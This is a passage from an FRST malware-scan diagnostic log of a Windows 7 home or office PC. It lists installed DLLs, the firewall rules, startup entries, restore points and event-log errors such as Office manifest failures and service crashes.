2010-06-30 01:12 - 2010-06-30 01:12 - 00028672 _____ () C:\Program Files (x86)\Hewlett-Packard\HP Advisor\Microsoft.Practices.EnterpriseLibrary.ExceptionHandling.Logging.dll
2009-11-19 10:20 - 2009-11-19 10:20 - 02121728 _____ () C:\Program Files (x86)\Common Files\LightScribe\QtCore4.dll
2009-11-19 10:20 - 2009-11-19 10:20 - 07745536 _____ () C:\Program Files (x86)\Common Files\LightScribe\QtGui4.dll
2009-11-19 10:20 - 2009-11-19 10:20 - 00135168 _____ () C:\Program Files (x86)\Common Files\LightScribe\plugins\imageformats\qjpeg4.dll
2015-06-16 16:47 - 2015-06-16 16:47 - 00100688 _____ () C:\Program Files (x86)\Citrix\AuthManager\AppReceiverSDKWrapper.dll
2016-08-23 19:23 - 2017-02-26 13:58 - 08929984 _____ () C:\Program Files (x86)\Microsoft Office\Root\Office16\1033\GrooveIntlResource.dll
2013-09-05 01:14 - 2013-09-05 01:14 - 04300456 _____ () C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Cultures\OFFICE.ODF
2010-10-20 15:45 - 2010-10-20 15:45 - 08801120 _____ () C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveIntlResource.dll
2016-08-23 19:17 - 2017-03-05 19:51 - 00252608 _____ () C:\Program Files (x86)\Microsoft Office\root\Office16\IEAWSDC.DLL

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)

==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Wdf01000.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Wdf01000.sys => ""="Driver"

==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)

==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)

IE trusted site: HKU\S-1-5-21-3698744866-2675293530-421701469-1001\...\sharepoint.com -> hxxps://geisinger-files.sharepoint.com

==================== Hosts content: ===============================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 22:34 - 2012-08-15 20:16 - 00000027 ____A C:\Windows\system32\Drivers\etc\hosts

127.0.0.1       localhost

==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-3698744866-2675293530-421701469-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\KEKLR\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 204.186.80.229 - 204.186.110.114
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^HP Digital Imaging Monitor.lnk => C:\Windows\pss\HP Digital Imaging Monitor.lnk.CommonStartup
MSCONFIG\startupfolder: C:^Users^KEKLR^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^OneNote 2007 Screen Clipper and Launcher.lnk => C:\Windows\pss\OneNote 2007 Screen Clipper and Launcher.lnk.Startup
MSCONFIG\startupreg: Adobe ARM => "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
MSCONFIG\startupreg: msnmsgr => "C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe" /background
MSCONFIG\startupreg: NortonOnlineBackupReminder => "C:\Program Files (x86)\Symantec\Norton Online Backup\Activation\NobuActivation.exe" UNATTENDED
MSCONFIG\startupreg: ooVoo.exe => C:\Program Files (x86)\ooVoo\oovoo.exe /minimized
MSCONFIG\startupreg: SunJavaUpdateSched => "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [{E1D7F83E-8125-4845-90A7-673ADEF33553}] => (Allow) svchost.exe
FirewallRules: [{B3229E98-0217-4660-8DE6-F3FAB7DC660B}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDirector\PDR.EXE
FirewallRules: [{25561CBD-ECD5-4B2A-A6B7-AAC23815F36E}] => (Allow) c:\Program Files (x86)\Hewlett-Packard\Media\DVD\HPTouchSmartMusic.exe
FirewallRules: [{DFFCBF30-C5DF-4898-8A74-672CBD634E93}] => (Allow) c:\Program Files (x86)\Hewlett-Packard\Media\DVD\HPTouchSmartPhoto.exe
FirewallRules: [{1A8F384C-D5FB-424C-864F-DFBDD7097751}] => (Allow) c:\Program Files (x86)\Hewlett-Packard\Media\DVD\HPTouchSmartVideo.exe
FirewallRules: [{25AD11FD-9A9F-4400-AD7E-D1702D6879EC}] => (Allow) c:\Program Files (x86)\Hewlett-Packard\Media\DVD\TSMAgent.exe
FirewallRules: [{88F56785-A335-4A9E-A307-233FED433B1E}] => (Allow) c:\Program Files (x86)\Hewlett-Packard\Media\DVD\Kernel\CLML\CLMLSvc.exe
FirewallRules: [{0FA28E00-84B9-499D-BABD-0FF0CB52E7DA}] => (Allow) c:\Program Files (x86)\Hewlett-Packard\Media\DVD\HPDVDSmart.exe
FirewallRules: [{EA67C5FD-9887-4967-B124-B80BDD1D9572}] => (Allow) c:\Program Files (x86)\Hewlett-Packard\TouchSmart\Media\HPTouchSmartMusic.exe
FirewallRules: [{C32D536B-BDF8-48A2-B50E-15F07DFB9F1A}] => (Allow) c:\Program Files (x86)\Hewlett-Packard\TouchSmart\Media\HPTouchSmartPhoto.exe
FirewallRules: [{5AAFCC03-01D9-4D96-9427-3F2C6DE5154E}] => (Allow) c:\Program Files (x86)\Hewlett-Packard\TouchSmart\Media\HPTouchSmartVideo.exe
FirewallRules: [{EA1F0951-8BA5-41CB-A72A-34307C6E1966}] => (Allow) c:\Program Files (x86)\Hewlett-Packard\TouchSmart\Media\TSMAgent.exe
FirewallRules: [{98616B3D-0AAC-4C16-8ECE-981D41D17865}] => (Allow) c:\Program Files (x86)\Hewlett-Packard\TouchSmart\Media\Kernel\CLML\CLMLSvc.exe
FirewallRules: [{D639F928-A1C7-4D0F-9135-C8527DF99989}] => (Allow) c:\Program Files (x86)\Hewlett-Packard\Media\Live TV\QP.exe
FirewallRules: [{CD01A839-E293-40DF-A297-6D1E71CBF919}] => (Allow) c:\Program Files (x86)\Hewlett-Packard\Media\Live TV\QPService.exe
FirewallRules: [{1159FAE0-AD6A-402E-BF7C-378981DE37CE}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqtra08.exe
FirewallRules: [{4216947E-E48E-4D68-832C-B84405FCA4FD}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqste08.exe
FirewallRules: [{B1B24A7E-5C03-4B2E-BC74-F446D90241B1}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hposid01.exe
FirewallRules: [{71E5C151-FC96-44B3-A2CA-A748564E2318}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpoews01.exe
FirewallRules: [{AE1DD8AE-DAA6-4E3A-A82E-0B84DD062818}] => (Allow) C:\Program Files (x86)\HP\hp software update\hpwucli.exe
FirewallRules: [{2E3483C0-9134-4DEC-A8D6-FE74ABD65F6D}] => (Allow) C:\Program Files (x86)\HP\digital imaging\smart web printing\smartwebprintexe.exe
FirewallRules: [TCP Query User{9F515C7B-8CC7-4B76-8DF6-F904758E6FF6}C:\program files (x86)\ftp\ws_ftp\ws_ftp95.exe] => (Allow) C:\program files (x86)\ftp\ws_ftp\ws_ftp95.exe
FirewallRules: [UDP Query User{8D839777-A6FB-47E8-B380-7AD82C5F564F}C:\program files (x86)\ftp\ws_ftp\ws_ftp95.exe] => (Allow) C:\program files (x86)\ftp\ws_ftp\ws_ftp95.exe
FirewallRules: [TCP Query User{5A0D406D-2C29-4D0B-83D7-D26AF7FFE562}C:\program files (x86)\ftp\ws_ftp\ws_ftp95.exe] => (Block) C:\program files (x86)\ftp\ws_ftp\ws_ftp95.exe
FirewallRules: [UDP Query User{A60AD26E-BC55-4B0C-BB47-6E4EF5036555}C:\program files (x86)\ftp\ws_ftp\ws_ftp95.exe] => (Block) C:\program files (x86)\ftp\ws_ftp\ws_ftp95.exe
FirewallRules: [{93464EED-A641-4CB5-8DC6-92BFDF7A1E14}] => (Allow) C:\Program Files (x86)\AVG\AVG10\avgmfapx.exe
FirewallRules: [{DC01FAA2-E761-4009-AD0C-43E643AD9B75}] => (Allow) C:\Program Files (x86)\AVG\AVG10\avgmfapx.exe
FirewallRules: [TCP Query User{303F326C-E8E1-4E8E-B813-F47FFD9F0723}C:\windows\system32\wfs.exe] => (Allow) C:\windows\system32\wfs.exe
FirewallRules: [UDP Query User{DCA3884F-EB76-4A60-A6B9-1DFF3FE0BBD0}C:\windows\system32\wfs.exe] => (Allow) C:\windows\system32\wfs.exe
FirewallRules: [{807B38CE-D94F-4932-B5B4-76AFD4EACD49}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{286E2E43-1C9B-4F06-B81D-1AC670CE9FB6}] => (Allow) C:\Program Files (x86)\AVG\AVG2012\avgmfapx.exe
FirewallRules: [{60FE7295-6201-4657-999B-4EF247CE7B99}] => (Allow) C:\Program Files (x86)\AVG\AVG2012\avgmfapx.exe
FirewallRules: [TCP Query User{1DE570DA-78EC-4184-A009-98FB9B493B34}C:\program files (x86)\oovoo\oovoo.exe] => (Allow) C:\program files (x86)\oovoo\oovoo.exe
FirewallRules: [UDP Query User{D887F8EE-A443-40B6-B7B5-600540129350}C:\program files (x86)\oovoo\oovoo.exe] => (Allow) C:\program files (x86)\oovoo\oovoo.exe
FirewallRules: [{5AB7D43E-8475-4578-A94A-1F2F90B7D6C0}] => (Allow) LPort=443
FirewallRules: [{B64ACE0E-B87F-4398-B1F3-852D19BE57F9}] => (Allow) LPort=443
FirewallRules: [{F6B20571-EB14-49D0-94C9-80FCB65ADCFF}] => (Allow) LPort=37674
FirewallRules: [{62D436F2-ADC2-4C86-96A8-B1F8CB9AC10F}] => (Allow) LPort=37674
FirewallRules: [{C3651C1F-C25C-4E6F-B502-3D5354C27B43}] => (Allow) LPort=37675
FirewallRules: [{0544294C-EA9B-402F-8605-23FF31F7AD74}] => (Allow) C:\Program Files (x86)\AVG\AVG2012\avgnsa.exe
FirewallRules: [{9CED51D6-960B-413C-A290-F9C46BAA9D15}] => (Allow) C:\Program Files (x86)\AVG\AVG2012\avgnsa.exe
FirewallRules: [{65EADB25-C00A-4DDC-A22F-5E81ACCB0EA9}] => (Allow) C:\Program Files (x86)\AVG\AVG2012\avgdiagex.exe
FirewallRules: [{A094DAF1-5D2E-4D12-8F1E-8FADDCD6C8FF}] => (Allow) C:\Program Files (x86)\AVG\AVG2012\avgdiagex.exe
FirewallRules: [{DCE8C09D-7BD0-4FFC-B0DE-1BAAA0BF727B}] => (Allow) C:\Program Files (x86)\AVG\AVG2012\avgemca.exe
FirewallRules: [{F2411DBE-A931-4B28-BDBC-0F63AE569E04}] => (Allow) C:\Program Files (x86)\AVG\AVG2012\avgemca.exe
FirewallRules: [TCP Query User{A4BC3617-A8AF-41F7-AEE3-B1AE7B986930}C:\windows\explorer.exe] => (Block) C:\windows\explorer.exe
FirewallRules: [UDP Query User{6536AA84-BEB9-43E7-BD20-81F36A8A183E}C:\windows\explorer.exe] => (Block) C:\windows\explorer.exe
FirewallRules: [TCP Query User{77151B81-74DA-46B2-B739-F1A0BFDE09EF}C:\program files (x86)\mozilla firefox\plugin-container.exe] => (Allow) C:\program files (x86)\mozilla firefox\plugin-container.exe
FirewallRules: [UDP Query User{41503EB1-8543-4238-BC72-9C7F53E08CFC}C:\program files (x86)\mozilla firefox\plugin-container.exe] => (Allow) C:\program files (x86)\mozilla firefox\plugin-container.exe
FirewallRules: [{572FCD51-C732-4315-89C8-E6BADF60CB1F}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe
FirewallRules: [{099E1608-3E83-453C-A568-BB3965D87EA4}] => (Allow) LPort=2869
FirewallRules: [{54E040B6-7378-4097-BFDA-57CEB23FB0C2}] => (Allow) LPort=1900
FirewallRules: [{31C42B69-8BB5-4738-AE2A-5F21F0EAC60E}] => (Allow) C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe
FirewallRules: [TCP Query User{D7ECE11A-14F4-47CD-8B60-C5D3AD970D7D}C:\program files (x86)\microsoft office\office14\groove.exe] => (Block) C:\program files (x86)\microsoft office\office14\groove.exe
FirewallRules: [UDP Query User{B68C8F2B-1ACD-468A-A168-2FEADD06031B}C:\program files (x86)\microsoft office\office14\groove.exe] => (Block) C:\program files (x86)\microsoft office\office14\groove.exe
FirewallRules: [{7025A58C-00CD-4143-96DB-FA06A2ED5CC4}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{1A452F1C-3A13-47C6-9924-6B9FE2FA2EE0}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{ADE58B14-70C6-4153-91AC-3B0E36524493}] => (Allow) C:\Windows\SysWOW64\dlcccoms.exe
FirewallRules: [{7301EA4A-8CC4-4DE8-AECF-6DAECD8DF3A8}] => (Allow) C:\Windows\SysWOW64\dlcccoms.exe
FirewallRules: [{9FCC936F-1ECC-4FF9-831B-D494B20D60CB}] => (Allow) C:\Windows\System32\dlcccoms.exe
FirewallRules: [{EE85E7CE-EDE5-48AC-95A9-56633C10661C}] => (Allow) C:\Windows\System32\dlcccoms.exe
FirewallRules: [{50F741E4-BECA-4A15-9FB8-0C32E919209B}] => (Allow) C:\Windows\System32\spool\drivers\x64\3\dlccpswx.exe
FirewallRules: [{F8DB05C7-6658-4DBF-8235-A5838701AA01}] => (Allow) C:\Windows\System32\spool\drivers\x64\3\dlccpswx.exe
FirewallRules: [{FBBE89C6-499F-4202-99AB-543184772EBF}] => (Allow) C:\Program Files (x86)\Dell Photo AIO Printer 924\dlccmon.exe
FirewallRules: [{FCDFFDF1-B40D-44DE-8327-3E803EEC7AA7}] => (Allow) C:\Program Files (x86)\Dell Photo AIO Printer 924\dlccmon.exe
FirewallRules: [{ADB57472-D531-4A14-B8EC-5CF09B84E0D7}] => (Allow) C:\Program Files (x86)\Dell Photo AIO Printer 924\dlccaiox.exe
FirewallRules: [{29BA85FB-5A48-4FAC-A9E5-EF97C797EBE1}] => (Allow) C:\Program Files (x86)\Dell Photo AIO Printer 924\dlccaiox.exe
FirewallRules: [{69C5F1E2-2BBF-4AC5-99AE-6EE52620C3BF}] => (Allow) C:\Users\KEKLR\AppData\Local\Microsoft\OneDrive\OneDrive.exe
FirewallRules: [{4F8121D3-305E-4B52-A980-511CF6637DA6}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{0969CE3F-AB75-4EDF-91BF-B24144E5BA03}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{64FD7F62-CA4F-4BC4-96FF-78AF71530077}] => (Allow) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPDeviceDetection3.exe
FirewallRules: [TCP Query User{70E1C592-B5C7-4724-8604-76CC8BAD46A9}C:\program files (x86)\hewlett-packard\hp support solutions\modules\hpdevicedetection3.exe] => (Allow) C:\program files (x86)\hewlett-packard\hp support solutions\modules\hpdevicedetection3.exe
FirewallRules: [UDP Query User{CB9AB233-D91A-411D-BF56-A1B265C80959}C:\program files (x86)\hewlett-packard\hp support solutions\modules\hpdevicedetection3.exe] => (Allow) C:\program files (x86)\hewlett-packard\hp support solutions\modules\hpdevicedetection3.exe
FirewallRules: [{167D5738-02EB-40A8-B8C3-0E4C0E60F425}] => (Allow) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPPSdr\HPDiagnosticCoreUI.exe
FirewallRules: [{6C278C1F-E02F-4F95-B22A-12C9D9CAFBE2}] => (Allow) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPPSdr\HPDiagnosticCoreUI.exe
FirewallRules: [{E4E886C7-1D80-42F9-B576-B3BC4F70B32E}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\outlook.exe
FirewallRules: [{C30BB94F-9D99-4F73-A420-F14961B522E1}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\Lync.exe
FirewallRules: [{9E3958BA-AD48-45B7-B7F9-9CEFF14FE771}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe
FirewallRules: [{B81E0F49-BA90-4FF1-9A42-A74A41023898}] => (Allow) C:\Users\KEKLR\AppData\Local\Temp\7zS1ADC\HPDiagnosticCoreUI.exe
FirewallRules: [{0647A174-0085-4BC0-9CA8-41C072C6371D}] => (Allow) C:\Users\KEKLR\AppData\Local\Temp\7zS1ADC\HPDiagnosticCoreUI.exe
FirewallRules: [{D8133625-8DFD-427B-9111-3D14776DFE7A}] => (Allow) C:\Users\KEKLR\AppData\Local\Temp\7zS744B\HPDiagnosticCoreUI.exe
FirewallRules: [{8E3EA3F7-663E-4722-852F-74C24267D0B0}] => (Allow) C:\Users\KEKLR\AppData\Local\Temp\7zS744B\HPDiagnosticCoreUI.exe
FirewallRules: [{84AECAC3-5692-4F37-B037-77FBE65C0467}] => (Allow) C:\Program Files (x86)\EPSON Software\Event Manager\EEventManager.exe
FirewallRules: [{3F971EA5-E550-44CC-BBD1-93F058891F2C}] => (Allow) C:\Program Files (x86)\EPSON Software\Event Manager\EEventManager.exe
FirewallRules: [TCP Query User{362CB37B-AAA1-45EF-A332-40E197A57F28}C:\program files (x86)\epson software\event manager\eeventmanager.exe] => (Allow) C:\program files (x86)\epson software\event manager\eeventmanager.exe
FirewallRules: [UDP Query User{717A6F34-710F-48AF-996D-EE1FFC536B8B}C:\program files (x86)\epson software\event manager\eeventmanager.exe] => (Allow) C:\program files (x86)\epson software\event manager\eeventmanager.exe
FirewallRules: [{62A8F062-EB0C-4869-8EC9-5517C0C12356}] => (Allow) C:\Program Files (x86)\Epson Software\Event Manager\EEventManager.exe
FirewallRules: [{9258237D-3CBE-457D-8BC3-B2B68083BB2D}] => (Allow) C:\Program Files (x86)\Epson Software\Event Manager\EEventManager.exe
FirewallRules: [{54F78F36-2594-42A1-B051-D6E5ADE67F9C}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\Lync.exe
FirewallRules: [{2F9785B8-F539-48A6-BA58-64C1FBF652D3}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe
FirewallRules: [{13573266-BCD3-483A-A735-153867261B87}] => (Allow) C:\Program Files (x86)\Trend Micro\DRScanner\sdk\TmDrMon.exe
FirewallRules: [{C6B475F1-8916-4E39-9711-A5D018D1F5F7}] => (Allow) C:\Program Files (x86)\Trend Micro\DRScanner\sdk\TmDrMon.exe
FirewallRules: [{FDED0C5D-B2C0-41D1-A5B1-410036D5E616}] => (Allow) C:\Program Files (x86)\Trend Micro\DRScanner\sdk\TmDrMon.exe
FirewallRules: [{37C5CB39-992C-4F99-90F0-F2718E8518BA}] => (Allow) C:\Program Files (x86)\Trend Micro\DRScanner\sdk\TmDrMon.exe
FirewallRules: [{D0DC0116-BF41-4FA5-98EE-EF32ECA5DF10}] => (Allow) C:\Program Files (x86)\Trend Micro\DRScanner\sdk\TmDrMon.exe
FirewallRules: [TCP Query User{F1F23913-8C7D-4B13-8D5A-52CC3B81421D}C:\program files (x86)\trend micro\drscanner\nmap\nmap.exe] => (Allow) C:\program files (x86)\trend micro\drscanner\nmap\nmap.exe
FirewallRules: [UDP Query User{7297ADDE-FFEE-4429-8DAD-7A733755025B}C:\program files (x86)\trend micro\drscanner\nmap\nmap.exe] => (Allow) C:\program files (x86)\trend micro\drscanner\nmap\nmap.exe
FirewallRules: [{9D2427F4-C33D-4E14-9231-9FFB1BBC1103}] => (Allow) C:\Program Files (x86)\Trend Micro\DRScanner\sdk\TmDrMon.exe
FirewallRules: [{B9D14B95-5465-4B94-9856-C19342AF6B05}] => (Allow) C:\Program Files (x86)\Trend Micro\DRScanner\sdk\TmDrMon.exe
FirewallRules: [{2E258567-5593-43F5-A73C-78A7678C2B39}] => (Allow) C:\Program Files (x86)\Trend Micro\DRScanner\sdk\TmDrMon.exe
FirewallRules: [{E0DF924F-D6D4-4654-A974-39E33E8AD879}] => (Allow) C:\Program Files (x86)\Trend Micro\DRScanner\sdk\TmDrMon.exe
FirewallRules: [{35A11117-24D7-4D6D-B9E2-0B15FB659EE3}] => (Allow) C:\Program Files (x86)\Trend Micro\DRScanner\sdk\TmDrMon.exe
FirewallRules: [{D752A735-DAF5-4D93-B15B-27B28773A8AD}] => (Allow) C:\Program Files (x86)\Trend Micro\DRScanner\sdk\TmDrMon.exe
FirewallRules: [{32A83C1F-89D4-4CBE-86D7-E8951ACF4700}] => (Allow) C:\Program Files (x86)\Trend Micro\DRScanner\sdk\TmDrMon.exe
FirewallRules: [{8045D3CF-65FE-46B4-B636-F5BF369728D9}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [TCP Query User{F283683E-A7E1-4A6D-8520-E295EFEF38C2}C:\users\keklr\appdata\local\temp\housecall\tmase\nmap\bonjour.exe] => (Allow) C:\users\keklr\appdata\local\temp\housecall\tmase\nmap\bonjour.exe
FirewallRules: [UDP Query User{607FE590-DF2E-479C-9421-F45292DFA0A9}C:\users\keklr\appdata\local\temp\housecall\tmase\nmap\bonjour.exe] => (Allow) C:\users\keklr\appdata\local\temp\housecall\tmase\nmap\bonjour.exe
FirewallRules: [{2AB6E6B9-4C5B-49D9-864E-2BA0C900C86E}] => (Allow) C:\Windows\Temp\DRSUnzipTemp\sdk\TmDrMon.exe
FirewallRules: [{E1E69D41-EA01-49BA-9769-D2C8FA30C630}] => (Allow) C:\Windows\Temp\DRSUnzipTemp\sdk\TmDrMon.exe
FirewallRules: [{2239062F-51E6-476E-B7F6-F5A9FE1F0608}] => (Allow) C:\Windows\Temp\DRSUnzipTemp\sdk\TmDrMon.exe

==================== Restore Points =========================

23-03-2017 17:47:02 Windows Update
30-03-2017 19:34:54 Windows Update
01-04-2017 07:21:37 Windows Update
05-04-2017 04:42:14 Windows Update
08-04-2017 08:47:30 Windows Update
09-04-2017 17:48:24 Restore Point Created by FRST
09-04-2017 18:43:29 Malwarebytes Anti-Rootkit Restore Point
09-04-2017 19:19:21 Microsoft Antimalware Checkpoint
10-04-2017 19:53:40 Microsoft Antimalware Checkpoint

==================== Faulty Device Manager Devices =============

Name: HP Integrated Module with Bluetooth 2.0 Wireless Technology
Description: HP Integrated Module with Bluetooth 2.0 Wireless Technology
Class Guid: {e0cbf06c-cd8b-4647-bb8a-263b43f0f974}
Manufacturer: Broadcom
Service: BTHUSB
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

==================== Event log errors: =========================

Application errors:
==================
Error: (04/11/2017 05:34:59 PM) (Source: SideBySide) (EventID: 35) (User: )
Description: Activation context generation failed for "C:\Program Files (x86)\Microsoft Office\root\Office16\lync.exe.Manifest".Error in manifest or policy file "C:\Program Files (x86)\Microsoft Office\root\Office16\UccApi.DLL" on line 1.
Component identity found in manifest does not match the identity of the component requested.
Reference is UccApi,processorArchitecture="AMD64",type="win32",version="16.0.0.0".
Definition is UccApi,processorArchitecture="x86",type="win32",version="16.0.0.0".
Please use sxstrace.exe for detailed diagnosis.

Error: (04/11/2017 05:34:59 PM) (Source: SideBySide) (EventID: 35) (User: )
Description: Activation context generation failed for "C:\Program Files (x86)\Microsoft Office\root\Office16\lync.exe.Manifest".Error in manifest or policy file "C:\Program Files (x86)\Microsoft Office\root\Office16\UccApi.DLL" on line 1.
Component identity found in manifest does not match the identity of the component requested.
Reference is UccApi,processorArchitecture="AMD64",type="win32",version="16.0.0.0".
Definition is UccApi,processorArchitecture="x86",type="win32",version="16.0.0.0".
Please use sxstrace.exe for detailed diagnosis.

Error: (04/11/2017 05:31:24 PM) (Source: Office 2016 Licensing Service) (EventID: 0) (User: )
Description: Event-ID 0

Error: (04/11/2017 07:27:06 AM) (Source: SideBySide) (EventID: 63) (User: )
Description: Activation context generation failed for "c:\program files (x86)\common files\adobe air\versions\1.0\Adobe AIR.dll".Error in manifest or policy file "c:\program files (x86)\common files\adobe air\versions\1.0\Adobe AIR.dll" on line 3.
The value "MAJOR_VERSION.MINOR_VERSION.BUILD_NUMBER_MAJOR.BUILD_NUMBER_MINOR" of attribute "version" in element "assemblyIdentity" is invalid.

Error: (04/11/2017 07:13:39 AM) (Source: SideBySide) (EventID: 80) (User: )
Description: Activation context generation failed for "c:\program files (x86)\eset\eset online scanner\ESETSmartInstaller.exe".Error in manifest or policy file "" on line .
A component version required by the application conflicts with another component version already active.
Conflicting components are:.
Component 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757.manifest.
Component 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d.manifest.

Error: (04/11/2017 06:46:59 AM) (Source: SideBySide) (EventID: 35) (User: )
Description: Activation context generation failed for "C:\Program Files (x86)\Microsoft Office\root\Office16\lync.exe.Manifest".Error in manifest or policy file "C:\Program Files (x86)\Microsoft Office\root\Office16\UccApi.DLL" on line 1.
Component identity found in manifest does not match the identity of the component requested.
Reference is UccApi,processorArchitecture="AMD64",type="win32",version="16.0.0.0".
Definition is UccApi,processorArchitecture="x86",type="win32",version="16.0.0.0".
Please use sxstrace.exe for detailed diagnosis.

Error: (04/10/2017 07:57:35 PM) (Source: SideBySide) (EventID: 35) (User: )
Description: Activation context generation failed for "C:\Program Files (x86)\Microsoft Office\root\Office16\lync.exe.Manifest".Error in manifest or policy file "C:\Program Files (x86)\Microsoft Office\root\Office16\UccApi.DLL" on line 1.
Component identity found in manifest does not match the identity of the component requested.
Reference is UccApi,processorArchitecture="AMD64",type="win32",version="16.0.0.0".
Definition is UccApi,processorArchitecture="x86",type="win32",version="16.0.0.0".
Please use sxstrace.exe for detailed diagnosis.

Error: (04/10/2017 07:57:35 PM) (Source: SideBySide) (EventID: 35) (User: )
Description: Activation context generation failed for "C:\Program Files (x86)\Microsoft Office\root\Office16\lync.exe.Manifest".Error in manifest or policy file "C:\Program Files (x86)\Microsoft Office\root\Office16\UccApi.DLL" on line 1.
Component identity found in manifest does not match the identity of the component requested.
Reference is UccApi,processorArchitecture="AMD64",type="win32",version="16.0.0.0".
Definition is UccApi,processorArchitecture="x86",type="win32",version="16.0.0.0".
Please use sxstrace.exe for detailed diagnosis.

Error: (04/10/2017 07:53:23 PM) (Source: VSS) (EventID: 8194) (User: )
Description: Volume Shadow Copy Service error: Unexpected error querying for the IVssWriterCallback interface.  hr = 0x80070005, Access is denied.
.
This is often caused by incorrect security settings in either the writer or requestor process.

Operation:
   Gathering Writer Data

Context:
   Writer Class Id: {e8132975-6f93-4464-a53e-1050253ae220}
   Writer Name: System Writer
   Writer Instance ID: {fdfd987f-623e-4408-a604-488e495676a8}

Error: (04/10/2017 05:29:39 PM) (Source: Office 2016 Licensing Service) (EventID: 0) (User: )
Description: Event-ID 0

System errors:
=============
Error: (04/10/2017 09:05:10 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 20.

Error: (04/09/2017 09:00:28 PM) (Source: Tcpip) (EventID: 4199) (User: )
Description: The system detected an address conflict for IP address 192.168.1.103 with the system
having network hardware address 00-6B-9E-91-74-6D. Network operations on this system may
be disrupted as a result.

Error: (04/09/2017 07:53:51 PM) (Source: Service Control Manager) (EventID: 7011) (User: )
Description: A timeout (30000 milliseconds) was reached while waiting for a transaction response from the ShellHWDetection service.

Error: (04/09/2017 06:45:02 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: The server {D085A4AB-CAB1-4729-9DF8-FCEEDDBD19E4} did not register with DCOM within the required timeout.

Error: (04/09/2017 05:49:47 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: The server {9E175B6D-F52A-11D8-B9A5-505054503030} did not register with DCOM within the required timeout.

Error: (04/09/2017 05:49:17 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The HP Support Solutions Framework Service service terminated unexpectedly.  It has done this 1 time(s).

Error: (04/09/2017 05:49:17 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Windows Search service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 30000 milliseconds: Restart the service.

Error: (04/09/2017 05:49:17 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The Cyberlink RichVideo Service(CRVS) service terminated unexpectedly.  It has done this 1 time(s).

Error: (04/09/2017 05:49:17 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Windows Live ID Sign-in Assistant service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 10000 milliseconds: Restart the service.

Error: (04/09/2017 05:49:17 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The SAMSUNG Mobile Connectivity Service service terminated unexpectedly.  It has done this 1 time(s).

CodeIntegrity:
===================================
  Date: 2012-08-15 20:12:34.270
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2012-08-15 20:12:34.192
